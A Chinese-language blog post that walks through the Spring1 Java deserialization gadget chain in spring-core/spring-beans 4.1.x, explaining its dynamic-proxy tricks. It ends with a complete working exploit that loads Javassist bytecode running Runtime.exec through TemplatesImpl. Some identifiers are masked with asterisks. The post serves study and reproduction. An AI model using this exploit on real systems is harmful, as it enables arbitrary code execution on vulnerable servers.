目录
影响版本:
利用链
漏洞之sink:MethodInvokeTypeProvider#readObject
动态代理在反序列化中的应用
让provider.getType()返回一个动态代理对象——打破桎梏
桥梁——ObjectFactoryDelegatingInvocationHandler
小结
EXP
前文:【Java】spring的ReflectionUtils类常用方法学习笔记-CSDN博客
【Java】关于动态代理的基础知识个人笔记-CSDN博客
影响版本:
jdk8u71之前
spring-core : 4.1.4.RELEASE
spring-beans : 4.1.4.RELEASE
利用链
/*
Gadget chain:
ObjectInputStream.readObject()
SerializableTypeWrapper.MethodInvokeTypeProvider.readObject()
SerializableTypeWrapper.TypeProvider(Proxy).getType()
AnnotationInvocationHandler.invoke()
HashMap.get()
ReflectionUtils.findMethod()
SerializableTypeWrapper.TypeProvider(Proxy).getType()
AnnotationInvocationHandler.invoke()
HashMap.get()
ReflectionUtils.invokeMethod()
Method.invoke()
Templates(Proxy).newTransformer()
AutowireUtils.ObjectFactoryDelegatingInvocationHandler.invoke()
ObjectFactory(Proxy).getObject()
AnnotationInvocationHandler.invoke()
HashMap.get()
Method.invoke()
TemplatesImpl.newTransformer()
TemplatesImpl.getTransletInstance()
TemplatesImpl.defi***ransletClasses()
TemplatesImpl.TransletClassLoader.defineClass()
Pwner*(Javassist-generated).<static init>
Runtime.exec()
*/漏洞之sink:MethodInvokeTypeProvider#readObject
先来看MethodInvokeTypeProvider的构造方法,要求传入provider,method和index
public MethodInvokeTypeProvider(TypeProvider provider, Method method, int index) {
this.provider = provider;
this.methodName = method.getName();
this.index = index;
this.result = ReflectionUtils.invokeMethod(method, provider.getType());
}再来看 MethodInvokeTypeProvider#readObject
private void readObject(ObjectInputStream inputStream) throws IOException, ClassNotFoundException {
inputStream.defaultReadObject();
Method method = ReflectionUtils.findMethod(this.provider.getType().getClass(), this.methodName);
this.result = ReflectionUtils.invokeMethod(method, this.provider.getType());
}
}这段代码调用了 ReflectionUtils,先是 findMethod 返回 Method 对象然后紧接着调用 invokeMethod 反射调用。注意,这里的调用是无参调用,对应的方法也是无参方法。
我们可以让this.methodName为newTransformer方法,并且让this.provider.getType()返回恶意TempletesImpl对象(其实并不是),从而调用TempletesImpl#newTransformer,触发类加载并执行任意代码(老面孔了,不作解释QWQ)
前者很好实现,直接传即可,后者则需要一番探讨。
动态代理在反序列化中的应用
我知道自己很啰嗦,但求求你先别急。
我们首先要有这样的两点朴素观念:
①类分两种,普通类主要负责实际的业务逻辑实现,调用了什么方法就实现什么逻辑;动态代理类主要负责在调用真实对象的方法前后,交由代理执行一些额外的逻辑
②InvocationHandler的invoke方法,不管外边执行什么方法,都会执行到invoke
下面聊聊动态代理在反序列化中的常见用法:
想象一个场景,我们的最终目的是调用Evil.func,
而入口类A入参是O,A中调用了非恶意的健康代码O.method,若O只是一个普通类,那么一切就很和谐地运行下去;若O是一个动态代理类,Evil类作为参数传入O,A中的O.method触发动态代理的invoke方法,invoke方法中调用了Evil.func,从而达成了我们的目的
让provider.getType()返回一个动态代理对象——打破桎梏
我们先来看看this.provider.getType()是何方神圣
interface TypeProvider extends Serializable {
Type getType();
Object getSource();
}不用看具体实现就能发现getType方法明确了返回的对象类型是Type类型
OK回到正题
我们想控制this.provider.getType()的返回值,最好的方法便是对provider使用动态代理,当调用到getType时通过InvocationHandler的处理让目标返回TemplatesImpl。
我们知道在AnnotationInvocationHandler#invoke中,传入的member的属性值已经给定为'getType'的情况下,就可以通过控制memberValues属性值来控制返回的对象(具体实现就是往HashMap放k为'getType',v为TemplatesImpl),这是否可行呢?
class AnnotationInvocationHandler implements InvocationHandler, Serializable {
private final Class<? extends Annotation> type;
private final Map<String, Object> memberValues;
AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {
Class<?>[] superInterfaces = type.getInterfaces();
if (!type.isAnnotation() ||
superInterfaces.length != 1 ||
superInterfaces[0] != java.lang.annotation.Annotation.class)
throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
this.type = type;
this.memberValues = memberValues;
}
public Object invoke(Object proxy, Method method, Object[] args) {
String member = method.getName();
Class<?>[] paramTypes = method.getParameterTypes();
// Handle Object and Annotation methods
if (member.equals("equals") && paramTypes.length == 1 &&
paramTypes[0] == Object.class)
return equalsImpl(args[0]);
if (paramTypes.length != 0)
throw new AssertionError("Too many parameters for an annotation method");
switch(member) {
case "toString":
return toStringImpl();
case "hashCode":
return hashCodeImpl();
case "annotationType":
return type;
}
// Handle annotation member a***essors
Object result = memberValues.get(member);
if (result == null)
throw new In***pleteAnnotationException(type, member);
if (result instanceof ExceptionProxy)
throw ((ExceptionProxy) result).generateException();
if (result.getClass().isArray() && Array.getLength(result) != 0)
result = cloneArray(result);
return result;
}
}很遗憾,并不行,因为上面也提到getType方法返回的对象类型是Type类型,若直接返回TemplatesImpl类型会类型转换错误而失败。
而我们需要的是返回值是 Type 类型又是 Templates 类型的类,如果是具体类,那条件未免有些苛刻,显然,其只能是个动态代理类
到这一步,我们已经确定了反序列化的入口是MethodInvokeTypeProvider,它的provider是用了AnnotationInvocationHandler作为handler的类型为typeProvider的动态代理类,并且其provider.getType()返回值是个既是Type 类型又是Templates 类型的动态代理类。
桥梁——ObjectFactoryDelegatingInvocationHandler
首先要清楚,这一长串玩意,本质上还是InvocationHandler,是给我们创建动态代理用的
and别忘了我们的目的是获取一个返回值是 Type 类型又是 Templates 类型的动态代理类传给AnnotationInvocationHandler
而这个动态代理类用的handler就是ObjectFactoryDelegatingInvocationHandler
它的构造方法接收一个ObjectFactory参数
public ObjectFactoryDelegatingInvocationHandler(ObjectFactory<?> objectFactory) {
this.objectFactory = objectFactory;
}OK打住,我们再看下ObjectFactoryDelegatingInvocationHandler#invoke
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
String methodName = method.getName();
if (methodName.equals("equals")) {
return proxy == args[0];
} else if (methodName.equals("hashCode")) {
return System.identityHashCode(proxy);
} else if (methodName.equals("toString")) {
return this.objectFactory.toString();
} else {
try {
return method.invoke(this.objectFactory.getObject(), args);
} catch (InvocationTargetException var6) {
throw var6.getTargetException();
}
}
}
}太优雅了,其对this.objectFactory.getObject()进行传入的method的反射方法调用,而getObject()返回值是一个泛型!
public interface ObjectFactory<T> {
T getObject() throws BeansException;
}
那只要我们能控制this.objectFactory.getObject()的返回结果为构造好的TemplateImpl对象即可,这样就可以配合传入的method(newTransformer)完成利用链的调用。
为了实现这个效果,这里我们又要套一层类型是ObjectFactory.class的代理类,并作为ObjectFactory参数传入DelegatingInvocationHandler
所以我们要创建objectFactory的动态代理并且让Handler为AnnocationInvocationHandler,并且设置memberValue属性中getObject为key,value为TemplatesImpl对象。(道理在上面讲过了,不作赘述)
至于返回值既是 Type 类型又是 Templates 类型要怎么实现呢
我们只要在创建代理时指定就好(啰嗦一嘴)
Class<?> clazz2 = Class.forName("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler");
Constructor<?> con2 = clazz2.getDeclaredConstructors()[0];
con2.setA***essible(true);
InvocationHandler ofdHandler = (InvocationHandler) con2.newInstance(factory);
Type typeTemplateProxy = (Type) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),
new Class[]{Type.class, Templates.class}, ofdHandler);小结
这条链共计用了三次动态代理,用了两次AnnotationInvocationHandler实现动态代理来修改方法的返回值,两个动态代理之间是通过ObjectFactoryDelegatingInvocationHandler实现动态代理作为桥梁连接起来的。
EXP
我复现用的是jdk8u20(
pom依赖
<dependencies>
<!-- https://mvnrepository.***/artifact/org.springframework/spring-core -->
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-core</artifactId>
<version>4.1.1.RELEASE</version>
</dependency>
<!-- https://mvnrepository.***/artifact/org.springframework/spring-beans -->
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-beans</artifactId>
<version>4.1.1.RELEASE</version>
</dependency>
<dependency>
<groupId>org.javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.29.2-GA</version>
</dependency>
</dependencies>召唤计算器的神奇咒语
package ***.spring;
import ***.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import ***.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.springframework.beans.factory.ObjectFactory;
import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.*;
import java.util.HashMap;
public class Spring1 {
public static void main(String[] args) throws Exception {
TemplatesImpl templates = TemplatesImpl.class.newInstance();
setValue(templates, "_bytecodes", new byte[][]{genPayload("calc")});
setValue(templates, "_name", "1");
Class<?> clazz1 = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> con1 = clazz1.getDeclaredConstructors()[0];
con1.setA***essible(true);
HashMap<String, Object> map1 = new HashMap<String, Object>();
map1.put("getObject", templates);
InvocationHandler invocationHandler1 = (InvocationHandler) con1.newInstance(Target.class, map1);
ObjectFactory<?> factory = (ObjectFactory<?>) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{ObjectFactory.class}, invocationHandler1);
Class<?> clazz2 = Class.forName("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler");
Constructor<?> con2 = clazz2.getDeclaredConstructors()[0];
con2.setA***essible(true);
InvocationHandler ofdHandler = (InvocationHandler) con2.newInstance(factory);
Type typeTemplateProxy = (Type) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),
new Class[]{Type.class, Templates.class}, ofdHandler);
HashMap<String, Object> map2 = new HashMap<String, Object>();
map2.put("getType", typeTemplateProxy);
InvocationHandler invocationHandler2 = (InvocationHandler) con1.newInstance(Target.class, map2);
Class<?> typeProviderClass = Class.forName("org.springframework.core.SerializableTypeWrapper$TypeProvider");
Object typeProviderProxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),
new Class[]{typeProviderClass}, invocationHandler2);
Class<?> clazz3 = Class.forName("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
Constructor<?> con3 = clazz3.getDeclaredConstructors()[0];
con3.setA***essible(true);
Object o = con3.newInstance(typeProviderProxy, Object.class.getMethod("toString"), 0);
setValue(o, "methodName", "newTransformer");
ser(o);
}
public static void ser(Object o) throws Exception {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(o);
oos.close();
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray()));
ois.readObject();
}
public static byte[] genPayload(String cmd) throws Exception {
ClassPool pool = ClassPool.getDefault();
CtClass clazz = pool.makeClass("a");
CtClass superClass = pool.get(AbstractTranslet.class.getName());
clazz.setSuperclass(superClass);
CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
constructor.setBody("Runtime.getRuntime().exec(\"" + cmd + "\");");
clazz.addConstructor(constructor);
clazz.getClassFile().setMajorVersion(49);
return clazz.toBytecode();
}
public static void setValue(Object obj, String name, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(name);
field.setA***essible(true);
field.set(obj, value);
}
}